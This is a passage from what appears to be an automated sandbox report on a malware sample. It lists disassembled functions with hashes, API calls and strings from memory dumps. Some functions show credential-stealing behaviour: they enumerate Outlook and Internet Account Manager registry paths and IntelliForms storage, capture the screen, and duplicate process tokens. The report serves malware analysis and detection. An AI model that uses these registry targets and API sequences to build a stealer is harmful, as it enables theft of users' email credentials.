                                                          • Instruction Fuzzy Hash: 7B514AF0E0264856FBB88A6988D57BFAB9A9B01304F2C043FD447D7392CB5D9D49C25E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00287875, Relevance: .3, Instructions: 347COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
                                                          • Instruction ID: 7c9ac20d09f9eea48851a1f4dfa28c090d6954174d734dd684833cf3a660d29f
                                                          • Opcode Fuzzy Hash: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
                                                          • Instruction Fuzzy Hash: 79E13775E2521A8FCF14DFA8D9806ADBBF6FF98314F20816AD855E7380D630AA51CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D1A92, Relevance: .3, Instructions: 327COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                          • String ID:
                                                          • API String ID: 4283097504-0
                                                          • Opcode ID: 9f37dfb9ddde3d43bb3be84e2d04d6ed0a1de22fc49922ce1be2303cbfa165a9
                                                          • Instruction ID: f7ad04968768fdec40822de10e72b5d93f72d68794dbbaf672da8d6f2c8151b1
                                                          • Opcode Fuzzy Hash: 9f37dfb9ddde3d43bb3be84e2d04d6ed0a1de22fc49922ce1be2303cbfa165a9
                                                          • Instruction Fuzzy Hash: 8DB1FB75620706ABDB389F65CC82BB773E9EF04308F54456FE94386A80EB74AD65CB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0044217B, Relevance: .3, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                          • Instruction ID: e92119de4178947616e1ed6b064d405ef24a87d3d926f5ffd7b1d67207f09e8c
                                                          • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                          • Instruction Fuzzy Hash: 4C9177761080E34AFB2D467A863403FFFE16A913A135A079FF8F2CB2C1EE589555D624
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00442436, Relevance: .2, Instructions: 244COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                          • Instruction ID: c8240a77dafbea04a184945437e144a38cae919a30270fc343ac34902ab3d187
                                                          • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                          • Instruction Fuzzy Hash: 979155721090A34AFB69463A863403FFFE15A923A135A079FF4F2CB2C5EE68D554D624
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B814A, Relevance: .2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3b6c4a552cb4c6ebc8dfd5146c2ae6228b2b76b1a7ebfa1a7dfd21234ffd72f
                                                          • Instruction ID: 9ebc786f196e99b95ab417313bd4617759912b055c68f5c34eea2a03d3097709
                                                          • Opcode Fuzzy Hash: d3b6c4a552cb4c6ebc8dfd5146c2ae6228b2b76b1a7ebfa1a7dfd21234ffd72f
                                                          • Instruction Fuzzy Hash: 85518171E1015AEFDF04CF99C941AEEBBB6FF88344F198059E919AB241C7349E51CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CA229, Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 777179e1b6b13356a6bfaa5384b928ec82cfcfad9d6967a0da8e3719797925e5
                                                          • Instruction ID: 7512e05e6399421659eafe808e87f0f31222ffff69c88a505edf4527839c0d61
                                                          • Opcode Fuzzy Hash: 777179e1b6b13356a6bfaa5384b928ec82cfcfad9d6967a0da8e3719797925e5
                                                          • Instruction Fuzzy Hash: BD21B373F205394B7B0CC47E8C562BDB6E1C68C601745823EE8A6EA2C1D968D917E2E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CA109, Relevance: .1, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b04bb1ad1d59c57b122934c6767bec2f24888615b11aace5a1f65d51707004dd
                                                          • Instruction ID: 44869385d142451fc943e4a10f228a2f0991106ef7ebfe578011938fc230779c
                                                          • Opcode Fuzzy Hash: b04bb1ad1d59c57b122934c6767bec2f24888615b11aace5a1f65d51707004dd
                                                          • Instruction Fuzzy Hash: F3117723F30C296A675C816D8C1727A95D2DBD825474F533ED826E7284E9A4DE23D290
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B2A90, Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: 236199aabb954f350017519710d75a8688bdb6699f6175c3f65fc1aec8a9ebce
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: A1110877220343C3D625CE2DCCB87F7A799FBC53A473D826AD0814B658D922A96D9600
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00442840, Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: 48fa2682931d18320991f4ec806078d2499e76ce29f6a855a2e4d47ee152914c
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: CD11717720005243F608EA3DDBB86BFA395FBD5321BAC437BF0418B758D1AAD9459608
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002880B8, Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16c525b8c3c715ddf65d38820951c285e36bf83de0e8e4a9ccc33f2d946379f1
                                                          • Instruction ID: 44b7938e1ccd05b852ce16f472d1a21cf99e60532b6502c937d0c52818c39b69
                                                          • Opcode Fuzzy Hash: 16c525b8c3c715ddf65d38820951c285e36bf83de0e8e4a9ccc33f2d946379f1
                                                          • Instruction Fuzzy Hash: 8D2166305240B20A861C4B3AAC21473BB90DB4720338B42BFF98FEA0C2C96AD575D7A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002AC6FE, Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ce76d41c545de1f07a73b13999950499d91140c5230c91f40e1556680cd32769
                                                          • Instruction ID: b3c2114965b16cbeacb4b7b16fb3d9f5a2295f7c16ee41dbd2e4e9dd4acb6418
                                                          • Opcode Fuzzy Hash: ce76d41c545de1f07a73b13999950499d91140c5230c91f40e1556680cd32769
                                                          • Instruction Fuzzy Hash: ED2165315341F206870D4A2ABC21632FB94D7473063CF42BBD98BDA1C2D629D560DBE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043C4AE, Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ce76d41c545de1f07a73b13999950499d91140c5230c91f40e1556680cd32769
                                                          • Instruction ID: a0ca356d85ad083afff2c7bc00f792987a3ab75c6fc365ca4b06a81b493b66a5
                                                          • Opcode Fuzzy Hash: ce76d41c545de1f07a73b13999950499d91140c5230c91f40e1556680cd32769
                                                          • Instruction Fuzzy Hash: 3C2133315341B515870D462A6C61633BB90D74B30638B42BBE98AEA1C2D529D560D7E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C9CFE, Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25545819257121799df4905c8f06d5e4e3f05e484c5138027ed3e54231597322
                                                          • Instruction ID: 508bf87bdc06f2f75427bf1686a02b2798e31ba4ec83f3345f5c523f399b83b9
                                                          • Opcode Fuzzy Hash: 25545819257121799df4905c8f06d5e4e3f05e484c5138027ed3e54231597322
                                                          • Instruction Fuzzy Hash: FDF06D376702259BCB2AEE5CA95DF9872A8E706B10F11025AE102EB250C6B0DE90C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00270D90, Relevance: .0, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                                                          • Instruction ID: 4326c61fdeee6c5ac95d14fb6f28f9fc1a5621667719df649caf7d5ce22fe13a
                                                          • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                                                          • Instruction Fuzzy Hash: EEF0C276A20604DFDB21CFA4C885BAE73F9FB85315F0481A5D80AD7245D330F94A8B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C9C89, Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30c3e18387c4383c88683a825d144a2cbab061cb9361908acc6c045d8b474f45
                                                          • Instruction ID: e4f2f9cc047d6285ee9460aaf7f4a74d333a8c40bf3fb43ca1d4ccba807cabde
                                                          • Opcode Fuzzy Hash: 30c3e18387c4383c88683a825d144a2cbab061cb9361908acc6c045d8b474f45
                                                          • Instruction Fuzzy Hash: 81F03071661624ABCB16DB4CD849F8973ECEB49B50F11459BF401E7250C6B4EE50CBD4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C9CCD, Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92403a97fbed50927b61aa8c1d9d3443a332395fbe629e7164ed847735b9ec23
                                                          • Instruction ID: 887404b5d449d035b0f6ea195ace25930c6a3b094e0e15a75be679bf21be12eb
                                                          • Opcode Fuzzy Hash: 92403a97fbed50927b61aa8c1d9d3443a332395fbe629e7164ed847735b9ec23
                                                          • Instruction Fuzzy Hash: 5EE08C72A21228EBCB14DB8CC948E8AF3ECEB48B40B11429AB901D3210C271DF50CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00434150, Relevance: 28.6, APIs: 3, Strings: 16, Instructions: 102stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00433903: LoadLibraryA.KERNEL32(?), ref: 00433942
                                                            • Part of subcall function 00433903: GetProcAddress.KERNEL32(00000000,?), ref: 0043397D
                                                            • Part of subcall function 00433903: FreeLibrary.KERNEL32(00000000), ref: 004339B1
                                                            • Part of subcall function 00433D5D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00433D82
                                                            • Part of subcall function 00433D5D: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00433E13
                                                            • Part of subcall function 00433D5D: RegCloseKey.ADVAPI32(?), ref: 00433E20
                                                            • Part of subcall function 00433E2A: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00433E51
                                                            • Part of subcall function 00433E2A: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00433E7C
                                                            • Part of subcall function 00433E2A: lstrlenW.KERNEL32(?), ref: 00433E93
                                                            • Part of subcall function 00433E2A: lstrlenW.KERNEL32(?), ref: 00433EA0
                                                            • Part of subcall function 00433E2A: lstrcpyW.KERNEL32(00000000,?), ref: 00433EC1
                                                            • Part of subcall function 00433E2A: lstrcatW.KERNEL32 ref: 00433ECD
                                                            • Part of subcall function 00433E2A: lstrcatW.KERNEL32 ref: 00433EDB
                                                            • Part of subcall function 00433E2A: lstrcatW.KERNEL32 ref: 00433EE7
                                                            • Part of subcall function 00433E2A: RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 00433F21
                                                            • Part of subcall function 00433E2A: RegCloseKey.ADVAPI32(?), ref: 00433F36
                                                            • Part of subcall function 0043472B: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 00434773
                                                            • Part of subcall function 0043472B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 00434792
                                                            • Part of subcall function 0043472B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004347CD
                                                            • Part of subcall function 0043472B: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 004347EE
                                                          • lstrlenW.KERNEL32(00000000), ref: 004341B2
                                                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 004341CA
                                                          • lstrcpyW.KERNEL32(00000000,\Accounts), ref: 004341D6
                                                            • Part of subcall function 00433D5D: lstrlenW.KERNEL32(?), ref: 00433DA8
                                                            • Part of subcall function 00433D5D: lstrcpyW.KERNEL32(00000000,?), ref: 00433DC5
                                                            • Part of subcall function 00433D5D: lstrcatW.KERNEL32 ref: 00433DD1
                                                            • Part of subcall function 00433D5D: lstrcatW.KERNEL32 ref: 00433DDF
                                                            • Part of subcall function 00445491: _free.LIBCMT ref: 004454A4
                                                          Strings
                                                          • \Accounts, xrefs: 004341D0
                                                          • Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00434222
                                                          • Outlook, xrefs: 00434193
                                                          • Software\Microsoft\Internet Account Manager, xrefs: 00434198
                                                          • Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00434230
                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 00434214
                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 00434209
                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 0043425A
                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 0043416E
                                                          • Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 0043427C
                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 0043424C
                                                          • \Software\Microsoft\Internet Account Manager\Accounts, xrefs: 0043417A
                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 004341F7
                                                          • Identities, xrefs: 00434184
                                                          • Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 00434268
                                                          • Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 0043423E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
                                                          • String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
                                                          • API String ID: 527226083-92925148
                                                          • Opcode ID: 78a14d73dddb44db1bb56b23b62298a767081722b52ad043ac5de44d37292e4b
                                                          • Instruction ID: 0a5e46f332aa168931989d83c286f61dc6f7ae3e520f9c5552709636d45c2fb2
                                                          • Opcode Fuzzy Hash: 78a14d73dddb44db1bb56b23b62298a767081722b52ad043ac5de44d37292e4b
                                                          • Instruction Fuzzy Hash: E8315C71500208BAE704FBA29D87DEE73ACEB18749F60549EF04656192AFBC2F049629
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CA88B, Relevance: 25.9, APIs: 17, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 3409252457-0
                                                          • Opcode ID: a2cee8a33ffd5313128b55d5e33662c267da93d279f5fe52e53db185d5233257
                                                          • Instruction ID: 657f4ad8197ca3fa37c28d2bebb4dafa6ee66938652278a088b9d8e772aa62f8
                                                          • Opcode Fuzzy Hash: a2cee8a33ffd5313128b55d5e33662c267da93d279f5fe52e53db185d5233257
                                                          • Instruction Fuzzy Hash: 12D1E87192430AAFDB20AF649882F6D77F5EF00358F14476EE91197281EB719E60CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045A63B, Relevance: 25.9, APIs: 17, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 3409252457-0
                                                          • Opcode ID: 47ac4d9b139da9bf28491ce1198579c5abe4ff2d31606430b1391390cfe0e4bc
                                                          • Instruction ID: 04bfa061b0d3ff48b226e8994d94c5d61ab31ae7487acfdde331b6330ffce295
                                                          • Opcode Fuzzy Hash: 47ac4d9b139da9bf28491ce1198579c5abe4ff2d31606430b1391390cfe0e4bc
                                                          • Instruction Fuzzy Hash: A3D15871904205AFDB20AF759881A6E77A4EF04316F04466FED1097383EB3D8E18CB9E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00295735, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 193windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0029573A
                                                          • GetDesktopWindow.USER32 ref: 0029576E
                                                          • GetWindowRect.USER32(00000000,?), ref: 0029577B
                                                          • GetWindowDC.USER32(00000000), ref: 00295782
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002957A2
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 002957AB
                                                          • CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 002957F6
                                                          • SaveDC.GDI32(00000000), ref: 00295816
                                                          • SelectObject.GDI32(00000000,?), ref: 00295822
                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0029583B
                                                          • RestoreDC.GDI32(00000000,00000000), ref: 00295843
                                                          • _mbstowcs.LIBCMT ref: 002958EC
                                                          • DeleteObject.GDI32(00000010), ref: 0029592E
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Window$CreateObject$CapsCompatibleDeallocateDeleteDesktopDeviceH_prologRectRestoreSaveSectionSelect_mbstowcs
                                                          • String ID: (
                                                          • API String ID: 1791043667-3887548279
                                                          • Opcode ID: 0365018f032f50bb30352ab675fe485dd0ef43b4339eb9fbcd4084a37bf59893
                                                          • Instruction ID: 753f528d9207c93ffa5c9a17730b239d5bb5ddde23b2431ab0a7edde6ac1b7e4
                                                          • Opcode Fuzzy Hash: 0365018f032f50bb30352ab675fe485dd0ef43b4339eb9fbcd4084a37bf59893
                                                          • Instruction Fuzzy Hash: 927125B2D00219EFDF11DFA5DD84AAEBBB8FF09340F10412AE95AE3210E77459418FA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0029498A, Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0029498F
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DeallocateH_prolog
                                                          • String ID: "\$)sbj$.4$3ixp$a1$ce6$hr(t$jfnk$m$p|tq$w${az`
                                                          • API String ID: 3708980276-828241358
                                                          • Opcode ID: 73a3f68d0fd7e04704ed218e61036f37196381fbc0ca607f1269cf142860d94d
                                                          • Instruction ID: 49f3deb037c0f819adbb38ae0c93c345e8eaa47e18f02e0d543b11c13a0db848
                                                          • Opcode Fuzzy Hash: 73a3f68d0fd7e04704ed218e61036f37196381fbc0ca607f1269cf142860d94d
                                                          • Instruction Fuzzy Hash: B2C1C130D25288CADF15EFA4C8A1BEDBB71AF15300F5081ADD44A77242EF745A99CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0042473A, Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0042473F
                                                            • Part of subcall function 00408ADD: __EH_prolog.LIBCMT ref: 00408AE2
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: DeallocateH_prolog
                                                          • String ID: "\$)sbj$.4$3ixp$a1$ce6$hr(t$jfnk$m$p|tq$w${az`
                                                          • API String ID: 3708980276-828241358
                                                          • Opcode ID: 2507bf9110a26e6cf9fb2a39fdff93a4785e9b9747e2cb0df1e6dfbf3ac37fa8
                                                          • Instruction ID: 95190f89d38220a43a603cdf424b2afc74788596df9b67c85a64414ae97ef53f
                                                          • Opcode Fuzzy Hash: 2507bf9110a26e6cf9fb2a39fdff93a4785e9b9747e2cb0df1e6dfbf3ac37fa8
                                                          • Instruction Fuzzy Hash: D7C1E430D04298CADF15EFA5D8916EDBB71AF55304F9041AED04A7B282DF381A8DCF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C1D06, Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          • Opcode ID: 3a0cb680fe32ae3a8356e4aa283f41110fc6438a3de420b896e33cebbee0e4cc
                                                          • Instruction ID: dc723b0fa479a2f113948840044952ec6eca41451c330823e6e3e55931577d11
                                                          • Opcode Fuzzy Hash: 3a0cb680fe32ae3a8356e4aa283f41110fc6438a3de420b896e33cebbee0e4cc
                                                          • Instruction Fuzzy Hash: 62D1AF719103069FDB21DFA8C881FEEBBF5BF09300F14426EE899A7252DB71A955CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0044E4A3, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 403COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0044E549
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0044E56D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Module$FileHandleName
                                                          • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                          • API String ID: 4146042529-3261600717
                                                          • Opcode ID: d3382353ea9e1a4765f3d112388ecfc52b60c949f779bf19af65660449ba3eb4
                                                          • Instruction ID: 7133c5d197fdfebefc82b5d6757d36b4a473358f921d101e274058f6c57f6431
                                                          • Opcode Fuzzy Hash: d3382353ea9e1a4765f3d112388ecfc52b60c949f779bf19af65660449ba3eb4
                                                          • Instruction Fuzzy Hash: A7C1F875A0010966EF206A368C4AFFB7378EF65709F44406EFC09D6252F7389E49C6AD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A7E21, Relevance: 19.6, APIs: 13, Instructions: 141processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A7E26
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002A7E87
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002A7EA1
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 002A7F15
                                                          • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 002A7F27
                                                          • DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?), ref: 002A7F42
                                                          • CloseHandle.KERNEL32(?), ref: 002A7F4F
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A7F62
                                                          • _strlen.LIBCMT ref: 002A7F6F
                                                          • _mbstowcs.LIBCMT ref: 002A7F84
